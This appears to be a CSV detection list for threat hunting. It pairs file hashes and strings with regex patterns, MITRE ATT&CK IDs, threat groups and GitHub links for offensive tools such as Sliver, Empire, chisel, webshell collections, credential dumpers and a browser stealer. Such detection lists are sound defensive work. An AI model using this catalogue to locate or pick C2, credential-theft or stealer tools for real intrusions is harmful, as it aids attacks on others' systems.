"*0ef24b00e5bfbb3cbfbc6880f5ff42bbbdcc57c288c2e610d82a697da29cd074*",".{0,1000}0ef24b00e5bfbb3cbfbc6880f5ff42bbbdcc57c288c2e610d82a697da29cd074.{0,1000}","offensive_tool_keyword","Amass","The OWASP Amass Project performs network mapping of attack surfaces and external asset discovery using open source information gathering and active reconnaissance techniques.","T1595 - T1596 - T1018 - T1482","TA0007 - TA0043  - ","N/A","EMBER BEAR","Reconnaissance","https://github.com/caffix/amass","1","0","#filehash #linux","N/A","5","","N/A","","","","21744"
"*0efa187631cbd593e757b52c3a2e8328857b1cd15a93724870d767f71964dd62*",".{0,1000}0efa187631cbd593e757b52c3a2e8328857b1cd15a93724870d767f71964dd62.{0,1000}","offensive_tool_keyword","tun2socks","socks tunneling","T1572 - T1090 - T1071 - T1573 - T1205","TA0010 - TA0011 - TA0008 - TA0005","N/A","N/A","C2","https://github.com/xjasonlyu/tun2socks","1","0","#filehash","N/A","10","10","3785","513","2025-04-15T21:19:25Z","2019-07-16T03:25:40Z","21745"
"*0evilpwfilter*",".{0,1000}0evilpwfilter.{0,1000}","offensive_tool_keyword","venom","venom - C2 shellcode generator/compiler/handler","T1027 - T1055 - T1071 - T1505 - T1566 - T1570","TA0001 - TA0002 - TA0003 - TA0008 - TA0010","N/A","N/A","Resource Development","https://github.com/r00t-3xp10it/venom","1","1","N/A","N/A","N/A","10","1852","601","2023-12-09T00:42:22Z","2016-11-16T10:40:04Z","21747"
"*0evilpwfilter.dll*",".{0,1000}0evilpwfilter\.dll.{0,1000}","offensive_tool_keyword","redpill","Assist reverse tcp shells in post-exploration tasks","T1082 - T1016 - T1049 - T1057 - T1489 - T1070 - T1562 - T1563 - T1119 - T1518 - T1602 - T1530 - T1113 - T1125 - T1105 - T1133 - T1056 - T1114 - T1539 - T1552 - T1214 - T1110 - T1040 - T1436 - T1068 - T1088 - T1564 - T1112 - T1547 - T1574 - T1204 - T1215 - T1046 - T1557 - T1136 - T1059 - T1127 - T1555 - T1548 - T1115 - T1003","TA0007 - TA0003 - TA0005 - TA0009 - TA0002 - TA0006 - TA0004 - TA0010 - TA0011","N/A","N/A","Exploitation tool","https://github.com/r00t-3xp10it/redpill","1","1","N/A","N/A","10","3","218","52","2024-03-19T15:03:16Z","2021-02-20T23:59:07Z","21748"
"*0evilpwfilter.dll*",".{0,1000}0evilpwfilter\.dll.{0,1000}","offensive_tool_keyword","venom","venom - C2 shellcode generator/compiler/handler","T1027 - T1055 - T1071 - T1505 - T1566 - T1570","TA0001 - TA0002 - TA0003 - TA0008 - TA0010","N/A","N/A","Resource Development","https://github.com/r00t-3xp10it/venom","1","1","N/A","N/A","N/A","10","1852","601","2023-12-09T00:42:22Z","2016-11-16T10:40:04Z","21749"
"*0f06194447698d2570c3ea97e506da0faf309a8e63b8e4e2b04bb99a1e3f0e6d*",".{0,1000}0f06194447698d2570c3ea97e506da0faf309a8e63b8e4e2b04bb99a1e3f0e6d.{0,1000}","offensive_tool_keyword","ligolo-ng","An advanced tunneling tool that uses TUN interfaces","T1572 - T1090","TA0011","N/A","Dispossessor - AvosLocker - LockBit","C2","https://github.com/nicocha30/ligolo-ng","1","0","#filehash","N/A","10","10","3380","338","2025-04-17T07:48:36Z","2021-07-28T12:55:36Z","21751"
"*0f0840b7da6f223c52f15ae1793c5a2942ce0d09ff493967b497a5d839eaaaa5*",".{0,1000}0f0840b7da6f223c52f15ae1793c5a2942ce0d09ff493967b497a5d839eaaaa5.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","0","#filehash","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","21752"
"*0f1e0f2ea2fd99d208b3bfafe79363c0b905303e12456c5473cd229882cf8fce*",".{0,1000}0f1e0f2ea2fd99d208b3bfafe79363c0b905303e12456c5473cd229882cf8fce.{0,1000}","offensive_tool_keyword","webshell","collection of webshell - observed used by famous webshells","T1100 - T1027 - T1059 - T1105","TA0003 - TA0005 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/tennc/webshell","1","0","#filehash","N/A","9","10","10344","5595","2024-12-24T15:37:05Z","2013-05-23T07:37:56Z","21756"
"*0f2d3c56a917f455906ba339ee8058b5f89138b8605b673eb669c1c6d0bebb5e*",".{0,1000}0f2d3c56a917f455906ba339ee8058b5f89138b8605b673eb669c1c6d0bebb5e.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","0","#filehash","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","21758"
"*0f3008f8210eb26ea38ca483f561707d720ae97972f63f9d1aa43b42d8beb6b9*",".{0,1000}0f3008f8210eb26ea38ca483f561707d720ae97972f63f9d1aa43b42d8beb6b9.{0,1000}","offensive_tool_keyword","taowu-cobalt-strike","Collection of hacktools binaries","T1003 - T1059 - T1087 - T1110 - T1135 - T1047 - T1078 - T1086 - T1098 - T1212 - T1021 - T1056 - T1071 - T1210 - T1484 - T1555 - T1055 - T1005 - T1090 - T1080 - T1204 - T1496 - T1114 - T1562 - T1482 - T1505 - T1548 - T1560 - T1566 - T1218 - T1547 - T1070 - T1206 - T1208","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011","N/A","N/A","Exploitation tool","https://github.com/pandasec888/taowu-cobalt_strike/tree/312fec79b3413ecfc06bc43efccfcbc1383a3566","1","0","#filehash","N/A","10","10","1797","330","2023-10-31T09:13:10Z","2020-07-05T10:13:00Z","21759"
"*0f340b471ef34c69f5413540acd3095c829ffc4df38764e703345eb5e5020301*",".{0,1000}0f340b471ef34c69f5413540acd3095c829ffc4df38764e703345eb5e5020301.{0,1000}","offensive_tool_keyword","fgdump","A utility for dumping passwords on Windows NT/2000/XP/2003 machines","T1003.001 - T1003.002 - T1077 - T1059 - T1035 - T1021.002 - T1562.001","TA0002 - TA0003 - TA0004 - TA0005 - TA0007 - TA0008","N/A","Volt Typhoon","Credential Access","https://github.com/ihamburglar/fgdump","1","0","#filehash","N/A","10","1","8","4","2012-01-14T19:05:42Z","2015-10-11T17:08:47Z","21760"
"*0f45809e1a640a7f54dd5211aff1b5239c310b0e81ddfb1244345ce6ec9d72e2*",".{0,1000}0f45809e1a640a7f54dd5211aff1b5239c310b0e81ddfb1244345ce6ec9d72e2.{0,1000}","offensive_tool_keyword","CDK","CDK is an open-sourced container penetration toolkit","T1610 - T1611 - T1203 - T1059.004 - T1564.004","TA0001 - TA0002 - TA0003 - TA0004 - TA0005","N/A","N/A","Persistence","https://github.com/cdk-team/CDK","1","0","#linux #filehash","N/A","9","10","4164","566","2025-03-08T14:00:06Z","2020-11-05T09:18:51Z","21763"
"*0f556749b43ff623079348b6ad75ddbc03d011cf9d6b2e9d548f030259a1aef1*",".{0,1000}0f556749b43ff623079348b6ad75ddbc03d011cf9d6b2e9d548f030259a1aef1.{0,1000}","offensive_tool_keyword","webshell","collection of webshell - observed used by famous webshells","T1100 - T1027 - T1059 - T1105","TA0003 - TA0005 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/tennc/webshell","1","0","#filehash","N/A","9","10","10344","5595","2024-12-24T15:37:05Z","2013-05-23T07:37:56Z","21766"
"*0f56c703e9b7ddeb90646927bac05a5c6d95308c8e13b88e5d4f4b572423e036*",".{0,1000}0f56c703e9b7ddeb90646927bac05a5c6d95308c8e13b88e5d4f4b572423e036.{0,1000}","offensive_tool_keyword","Bat-Potato","Automating Juicy Potato Local Privilege Escalation CMD exploit for penetration testers","T1055.012 - T1068 - T1548.002 - T1505.003","TA0004 - TA0003 - TA0005","N/A","N/A","Privilege Escalation","https://github.com/0x4xel/Bat-Potato","1","0","#filehash","N/A","10","1","42","11","2022-12-13T20:19:51Z","2022-12-12T20:50:22Z","21767"
"*0f56c703e9b7ddeb90646927bac05a5c6d95308c8e13b88e5d4f4b572423e036*",".{0,1000}0f56c703e9b7ddeb90646927bac05a5c6d95308c8e13b88e5d4f4b572423e036.{0,1000}","offensive_tool_keyword","precompiled-binaries","executables for penetration testing Windows Active Directory environments","T1016 - T1046 - T1087 - T1082 - T1055 - T1068 - T1083 - T1012 - T1558 - T1097 - T1077 - T1134 - T1550 - T1078 - T1021 - T1072 - T1484 - T1553 - T1557 - T1003 - T1555 - T1134 - T1055 - T1088","TA0007 - TA0008 - TA0004 - TA0006 - TA0002 - TA0005","N/A","N/A","Exploitation tool","https://github.com/jakobfriedl/precompiled-binaries","1","0","#filehash","N/A","10","2","138","38","2025-03-06T13:02:11Z","2023-08-08T12:21:46Z","21768"
"*0f56c703e9b7ddeb90646927bac05a5c6d95308c8e13b88e5d4f4b572423e036*",".{0,1000}0f56c703e9b7ddeb90646927bac05a5c6d95308c8e13b88e5d4f4b572423e036.{0,1000}","offensive_tool_keyword","SharPyShell","SharPyShell - tiny and obfuscated ASP.NET webshell for C# web","T1505.003 - T1059.007 - T1027.002 - T1027.004","TA0002 - TA0003 - TA0004 - TA0005 - TA0011","N/A","N/A","C2","https://github.com/antonioCoco/SharPyShell","1","0","#filehash","N/A","10","10","955","147","2023-11-26T17:14:06Z","2019-03-10T22:09:40Z","21769"
"*0f5c81f14171b74fcc9777d302304d964e63ffc2d7b634ef023a7249d9b5d875*",".{0,1000}0f5c81f14171b74fcc9777d302304d964e63ffc2d7b634ef023a7249d9b5d875.{0,1000}","offensive_tool_keyword","xz","backdoor in upstream xz/liblzma leading to ssh server compromise","T1174 - T1056 - T1210 - T1550 - T1036 - T1077","TA0005 - TA0006 - TA0003 - TA0008 - TA0009 - TA0011","N/A","N/A","Malware","https://securelist.com/xz-backdoor-story-part-1/112354/","1","0","#filehash","N/A","10","10","N/A","N/A","N/A","N/A","21772"
"*0f62d209e39c648d15f268c68056e5f309d5eb6c7b0eff890f5ccaf9a0e12b96*",".{0,1000}0f62d209e39c648d15f268c68056e5f309d5eb6c7b0eff890f5ccaf9a0e12b96.{0,1000}","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1105 - T1071.004 - T1021 - T1573.001 - T1132 - T1095 - T1041 - T1074.002 - T1568.002 - T1204 - T1055.012","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011 - TA0040 - TA0042 - TA0043","N/A","AvosLocker - APT29 - Cinnamon Tempest - GOLD CABIN - COZY BEAR - Black Basta","C2","https://github.com/BishopFox/sliver","1","0","#filehash","N/A","10","10","9218","1249","2025-04-21T17:52:43Z","2019-01-17T22:07:38Z","21774"
"*0f638c5cbc07c8c0f3f2343f5459af22e80e6a4abaeef14740454486903fcbb8*",".{0,1000}0f638c5cbc07c8c0f3f2343f5459af22e80e6a4abaeef14740454486903fcbb8.{0,1000}","offensive_tool_keyword","Omnispray","Modular Enumeration and Password Spraying Framework","T1110 - T1078.003 - T1087.002 - T1621","TA0001 - TA0002 - TA0006 - TA0007 - TA0009","N/A","N/A","Credential Access","https://github.com/0xZDH/Omnispray","1","0","#filehash","N/A","10","2","118","19","2024-04-10T20:05:46Z","2021-02-25T07:28:06Z","21775"
"*0f699c5851b2727d8a1af5fd9c7507ac23e39bd072619866bd9e6774e6595efc*",".{0,1000}0f699c5851b2727d8a1af5fd9c7507ac23e39bd072619866bd9e6774e6595efc.{0,1000}","offensive_tool_keyword","ligolo-ng","An advanced tunneling tool that uses TUN interfaces","T1572 - T1090","TA0011","N/A","Dispossessor - AvosLocker - LockBit","C2","https://github.com/nicocha30/ligolo-ng","1","0","#filehash","N/A","10","10","3380","338","2025-04-17T07:48:36Z","2021-07-28T12:55:36Z","21776"
"*0f6c95ac01cddb461aef1267d60ded9c723aaed9c64cb4507df5cd94e9a1782c*",".{0,1000}0f6c95ac01cddb461aef1267d60ded9c723aaed9c64cb4507df5cd94e9a1782c.{0,1000}","offensive_tool_keyword","Eventlogedit-evtx--Evolution","","T1070.001 - T1564.001","TA0005","N/A","N/A","Defense Evasion","https://github.com/3gstudent/Eventlogedit-evtx--Evolution","1","0","#filehash","N/A","9","3","267","62","2021-04-17T01:28:00Z","2018-06-05T01:21:20Z","21777"
"*0f6cb2770be3533a4ab6b50f7d045c3c33cd2f61c37de652b638eef1217e3c41*",".{0,1000}0f6cb2770be3533a4ab6b50f7d045c3c33cd2f61c37de652b638eef1217e3c41.{0,1000}","offensive_tool_keyword","webshell","collection of webshell - observed used by famous webshells","T1100 - T1027 - T1059 - T1105","TA0003 - TA0005 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/tennc/webshell","1","0","#filehash","N/A","9","10","10344","5595","2024-12-24T15:37:05Z","2013-05-23T07:37:56Z","21778"
"*0f6e64bbfb810dd70627c534503ac49e468d77c31c033ff9de1640c3add5a99a*",".{0,1000}0f6e64bbfb810dd70627c534503ac49e468d77c31c033ff9de1640c3add5a99a.{0,1000}","offensive_tool_keyword","BloodHound","Use Invoke-BloodHound from SharpHound.ps1 or use SharpHound.exe. Both can be run reflectively. Examples below use the PowerShell variant but arguments are identical.","T1482 - T1087 - T1069 - T1018","TA0007 - TA0008 - TA0004","N/A","APT29 - MAZE - LockBit - Conti - XingLocker - Revil - Hive - Black Basta - Wizard Spider - TA2101 - TRAVELING SPIDER - Chimera - TA505 - APT20 - COZY BEAR - EMBER BEAR - Dispossessor","Discovery","https://github.com/BloodHoundAD/BloodHound/tree/master/Collectors","1","0","#filehash","N/A","10","10","10146","1759","2025-04-02T15:56:30Z","2016-04-17T18:36:14Z","21779"
"*0f7390905abc132889f7b9a6d5b42701173aafbff5b8f8882397af35d8c10965*",".{0,1000}0f7390905abc132889f7b9a6d5b42701173aafbff5b8f8882397af35d8c10965.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","0","#filehash","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","21780"
"*0f7b6ddc0ef44701c4ab1284610d51d36b4e79d68fb0e184d122533d77cbfb63*",".{0,1000}0f7b6ddc0ef44701c4ab1284610d51d36b4e79d68fb0e184d122533d77cbfb63.{0,1000}","offensive_tool_keyword","PEASS-ng","PEASS-ng - Privilege Escalation Awesome Scripts suite","T1098","TA0004 - TA0005","N/A","Scattered Spider* - PLAY - EMBER BEAR - COZY BEAR - Dispossessor","Privilege Escalation","https://github.com/peass-ng/PEASS-ng","1","0","#filehash","N/A","10","10","17347","3209","2025-04-01T04:29:00Z","2019-01-13T19:58:24Z","21782"
"*0f84fb1ee028a12de7b7dfd282528b61ee8f248d8f4a6ea1ba8ea186dc0a06a0*",".{0,1000}0f84fb1ee028a12de7b7dfd282528b61ee8f248d8f4a6ea1ba8ea186dc0a06a0.{0,1000}","offensive_tool_keyword","chisel","A fast TCP/UDP tunnel over HTTP","T1090 - T1090.003 - T1572 - T1572.001","TA0042 - TA0011","N/A","BlackSuit - Royal - AvosLocker - Cactus - Yanluowang - Sandworm - KNOTWEED","C2","https://github.com/jpillora/chisel","1","0","#filehash #linux #windows","N/A","10","10","14432","1466","2024-09-28T23:35:13Z","2015-02-25T11:42:50Z","21785"
"*0f8665de91ca0ad348cf3443430e2bf576ae225e0e02b2a75aee505530a2d6f2*",".{0,1000}0f8665de91ca0ad348cf3443430e2bf576ae225e0e02b2a75aee505530a2d6f2.{0,1000}","offensive_tool_keyword","Malware RAT collection","from Malware RAT samples","T1105 - T1059 - T1109 - T1016 - T1071.001 - T1082 - T1027 - T1083 - T1056 - T1106 - T1078 - T1053","TA0011 - TA0009 - TA0006 - TA0003 - TA0002 - TA0005 - TA0007","N/A","N/A","Malware","https://github.com/x-cod3r/Remote-administration-tools-archive","1","0","#filehash","N/A","9","1","93","30","2023-10-03T15:08:22Z","2023-10-03T13:09:00Z","21786"
"*0f8802e2c560ffe447ecaf7e88b9a7a0ac526c8e13b382822f9b4eba16c744a2*",".{0,1000}0f8802e2c560ffe447ecaf7e88b9a7a0ac526c8e13b382822f9b4eba16c744a2.{0,1000}","offensive_tool_keyword","sish","An open source serveo/ngrok alternative. HTTP(S)/WS(S)/TCP Tunnels to localhost using only SSH","T1572 - T1090.002","TA0010 - TA0005 - TA0011","N/A","N/A","C2","https://github.com/antoniomika/sish","1","0","#filehash","N/A","10","10","4203","325","2025-04-10T20:04:08Z","2019-02-15T15:36:23Z","21787"
"*0f898913633b4dad45a631e63466f6b76e591f896118bab6e718ab3c8587911f*",".{0,1000}0f898913633b4dad45a631e63466f6b76e591f896118bab6e718ab3c8587911f.{0,1000}","offensive_tool_keyword","BrowserSnatch","steals important data from all chromium and gecko browsers installed in the system and gather the data in a stealer db to be exfiltrated out. A powerful Browser Stealer","T1081 - T1074 - T1114 - T1005 - T1041 - T1027","TA0006 - TA0009 - TA0010","N/A","N/A","Data Exfiltration","https://github.com/shaddy43/BrowserSnatch","1","0","#filehash","N/A","10","3","246","39","2025-03-31T21:04:30Z","2024-08-26T18:38:42Z","21788"
"*0f8b3d08754df255a2d275a9b27c2f324e86f73cf7c679c577b1551b6dad590e*",".{0,1000}0f8b3d08754df255a2d275a9b27c2f324e86f73cf7c679c577b1551b6dad590e.{0,1000}","offensive_tool_keyword","lolminer","NVIDIA+AMD GPU Miner","T1496","TA0040","N/A","N/A","Cryptomining","https://github.com/Lolliedieb/lolMiner-releases","1","0","#filehash","N/A","9","10","2781","601","2025-02-01T20:03:57Z","2018-10-27T20:35:03Z","21789"
"*0f948584d230abb0e870a4e46541cdf4dd8b60f23fa7e031d27cd856bc49b4c4*",".{0,1000}0f948584d230abb0e870a4e46541cdf4dd8b60f23fa7e031d27cd856bc49b4c4.{0,1000}","offensive_tool_keyword","gsocket","The Global Socket Tookit allows two users behind NAT/Firewall to establish a TCP connection with each other. Securely.","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/hackerschoice/gsocket","1","0","#filehash","N/A","10","10","1671","142","2025-04-22T14:47:29Z","2020-09-18T16:14:22Z","21790"
"*0f9529f2e838c7f27f80270aed795440b4545eacb713bfb64e5ba84df104bfa5*",".{0,1000}0f9529f2e838c7f27f80270aed795440b4545eacb713bfb64e5ba84df104bfa5.{0,1000}","offensive_tool_keyword","taowu-cobalt-strike","Collection of hacktools binaries","T1003 - T1059 - T1087 - T1110 - T1135 - T1047 - T1078 - T1086 - T1098 - T1212 - T1021 - T1056 - T1071 - T1210 - T1484 - T1555 - T1055 - T1005 - T1090 - T1080 - T1204 - T1496 - T1114 - T1562 - T1482 - T1505 - T1548 - T1560 - T1566 - T1218 - T1547 - T1070 - T1206 - T1208","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011","N/A","N/A","Exploitation tool","https://github.com/pandasec888/taowu-cobalt_strike/tree/312fec79b3413ecfc06bc43efccfcbc1383a3566","1","0","#filehash","N/A","10","10","1797","330","2023-10-31T09:13:10Z","2020-07-05T10:13:00Z","21791"
"*0f99d2f2523047aa778e196a7f0bfd83580b3faa94299c52502d205957d23e5f*",".{0,1000}0f99d2f2523047aa778e196a7f0bfd83580b3faa94299c52502d205957d23e5f.{0,1000}","offensive_tool_keyword","SharpPack","collection of C# tools that include functionalities like Kerberoasting - ticket manipulation - Mimikatz - privilege escalation - domain enumeration and more","T1558.003 - T1003 - T1059.004 - T1078 - T1212 - T1087 - T1016 - T1071 - T1555 - T1203","TA0003 - TA0004 - TA0006 - TA0008 - TA0009 - TA0011","N/A","N/A","Exploitation tool","https://github.com/Lexus89/SharpPack","1","0","#filehash","N/A","10","1","78","19","2019-08-12T13:25:25Z","2018-10-01T12:45:16Z","21793"
"*0fa2d98ba9b3da4ccc9fbc07e0e9f29aea12fe878ad83dd0c8c83564849433e4*",".{0,1000}0fa2d98ba9b3da4ccc9fbc07e0e9f29aea12fe878ad83dd0c8c83564849433e4.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","0","#filehash","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","21795"
"*0fa3195520e1b55fa7d36818a916b9b8cee1ee673997ec71c18a52947697d2fb*",".{0,1000}0fa3195520e1b55fa7d36818a916b9b8cee1ee673997ec71c18a52947697d2fb.{0,1000}","offensive_tool_keyword","seatbelt","Seatbelt is a comprehensive security scanning tool that can be used to perform a variety of checks. including but not limited to. user privileges. logged in users. network information. system information. and many others","T1012 - T1016 - T1033 - T1046 - T1049 - T1057 - T1069 - T1082 - T1083 - T1098 - T1105 - T1113 - T1135 - T1201 - T1518","TA0001 - TA0002 - TA0003 - TA0004 - TA0007 - TA0011","N/A","Dispossessor","Persistence","https://github.com/GhostPack/Seatbelt","1","0","#filehash","N/A","10","10","4047","722","2025-01-10T20:12:49Z","2018-07-24T17:38:51Z","21796"
"*0fa31c8c34a370931d8ffe8097e998f778db63e2e036fbd7727a71a0dcf5d28c*",".{0,1000}0fa31c8c34a370931d8ffe8097e998f778db63e2e036fbd7727a71a0dcf5d28c.{0,1000}","offensive_tool_keyword","responder","LLMNR. NBT-NS and MDNS poisoner","T1557.001 - T1171 - T1547.011 - T1040","TA0011 - TA0006 - TA0007","N/A","Lazarus Group - APT28 - FANCY BEAR - EMBER BEAR","Sniffing & Spoofing","https://github.com/SpiderLabs/Responder","1","0","#filehash","N/A","N/A","10","4656","1722","2020-06-15T18:07:44Z","2012-10-24T14:35:12Z","21797"
"*0fa7194f72ad2e12774792f48c2cc01e4828356087210370acdd9c66b67f818b*",".{0,1000}0fa7194f72ad2e12774792f48c2cc01e4828356087210370acdd9c66b67f818b.{0,1000}","offensive_tool_keyword","empire","Empire is a post-exploitation and adversary emulation framework that is used to aid Red Teams and Penetration Testers.","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1157","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","Dispossessor - APT19 - APT33 - APT41 - Avaddon - BlackByte - BlackCat - CL0P - Conti - CopyKittens - FIN10 - FIN13 - HEXANE - Hive - Indrik Spider - LazyScripter - Leviathan - LockBit - MuddyWater - PYSA - Silence - Turla - Vice Society - WIRTE - Wizard Spider - CopyKittens - INDRIK SPIDER","Framework","https://github.com/BC-SECURITY/Empire","1","0","#filehash","N/A","10","10","4527","608","2025-04-07T03:02:25Z","2019-08-01T04:22:31Z","21798"
"*0fb342f94f359c9f54205a979854b7a3a3910bb7e118f0fc44cead28ebd81f0d*",".{0,1000}0fb342f94f359c9f54205a979854b7a3a3910bb7e118f0fc44cead28ebd81f0d.{0,1000}","offensive_tool_keyword","RottenPotatoNG","perform the RottenPotato attack and get a handle to a privileged token","T1134.001 - T1055.012 - T1547.001","TA0004","N/A","Sandworm","Privilege Escalation","https://github.com/breenmachine/RottenPotatoNG","1","0","#filehash","N/A","8","10","935","183","2017-12-29T14:38:47Z","2017-12-29T13:19:03Z","21800"
"*0fc82ac081b6c592d5e6fe4ebd650721c7cd19e9810a26927874ff95d073baff*",".{0,1000}0fc82ac081b6c592d5e6fe4ebd650721c7cd19e9810a26927874ff95d073baff.{0,1000}","offensive_tool_keyword","tun2socks","socks tunneling","T1572 - T1090 - T1071 - T1573 - T1205","TA0010 - TA0011 - TA0008 - TA0005","N/A","N/A","C2","https://github.com/xjasonlyu/tun2socks","1","0","#filehash","N/A","10","10","3785","513","2025-04-15T21:19:25Z","2019-07-16T03:25:40Z","21804"
"*0fc989cd644f58ef166d409d2f987bce4fa1544ca0e357d40095ce75ed444a7a*",".{0,1000}0fc989cd644f58ef166d409d2f987bce4fa1544ca0e357d40095ce75ed444a7a.{0,1000}","offensive_tool_keyword","ligolo-ng","An advanced tunneling tool that uses TUN interfaces","T1572 - T1090","TA0011","N/A","Dispossessor - AvosLocker - LockBit","C2","https://github.com/nicocha30/ligolo-ng","1","0","#filehash","N/A","10","10","3380","338","2025-04-17T07:48:36Z","2021-07-28T12:55:36Z","21806"
"*0fcb623d8d52c2357fb23ea4eb62a1553761faec062c084179e0211ec725a837*",".{0,1000}0fcb623d8d52c2357fb23ea4eb62a1553761faec062c084179e0211ec725a837.{0,1000}","offensive_tool_keyword","SharpPack","collection of C# tools that include functionalities like Kerberoasting - ticket manipulation - Mimikatz - privilege escalation - domain enumeration and more","T1558.003 - T1003 - T1059.004 - T1078 - T1212 - T1087 - T1016 - T1071 - T1555 - T1203","TA0003 - TA0004 - TA0006 - TA0008 - TA0009 - TA0011","N/A","N/A","Exploitation tool","https://github.com/Lexus89/SharpPack","1","0","#filehash","N/A","10","1","78","19","2019-08-12T13:25:25Z","2018-10-01T12:45:16Z","21807"
"*0fcd95460e9acfbfe7e232d4e464591ebd66896310e61750eef609937ae2a146*",".{0,1000}0fcd95460e9acfbfe7e232d4e464591ebd66896310e61750eef609937ae2a146.{0,1000}","offensive_tool_keyword","ldapnomnom","Anonymously bruteforce Active Directory usernames from Domain Controllers by abusing LDAP Ping requests (cLDAP)","T1110.003 - T1205","TA0007","N/A","N/A","Discovery","https://github.com/lkarlslund/ldapnomnom","1","0","#filehash","N/A","6","10","1030","80","2024-11-09T10:15:13Z","2022-09-18T10:35:09Z","21808"
"*0fcf4fd663a77b6782595c70df5f3a9910566a9820e4ca3342aeef99a6064b1a*",".{0,1000}0fcf4fd663a77b6782595c70df5f3a9910566a9820e4ca3342aeef99a6064b1a.{0,1000}","offensive_tool_keyword","WinPwnage","various exploitation tools for windows ","T1548.002 - T1546.016 - T1546.003 - T1547.001 - T1053.005 - T1053.003 - T1548 - T1055.011 - T1078","TA0004 - TA0005 - TA0009 - TA0003 - TA0011","N/A","N/A","Exploitation tool","https://github.com/rootm0s/WinPwnage","1","0","#filehash","N/A","10","10","2670","385","2023-02-13T09:43:13Z","2018-04-08T18:51:50Z","21809"
"*0fd11529bb961c342b925e156dbda40de75d4d9e823da6136ecb849b74b81e6a*",".{0,1000}0fd11529bb961c342b925e156dbda40de75d4d9e823da6136ecb849b74b81e6a.{0,1000}","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1105 - T1071.004 - T1021 - T1573.001 - T1132 - T1095 - T1041 - T1074.002 - T1568.002 - T1204 - T1055.012","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011 - TA0040 - TA0042 - TA0043","N/A","AvosLocker - APT29 - Cinnamon Tempest - GOLD CABIN - COZY BEAR - Black Basta","C2","https://github.com/BishopFox/sliver","1","0","#filehash","N/A","10","10","9218","1249","2025-04-21T17:52:43Z","2019-01-17T22:07:38Z","21811"
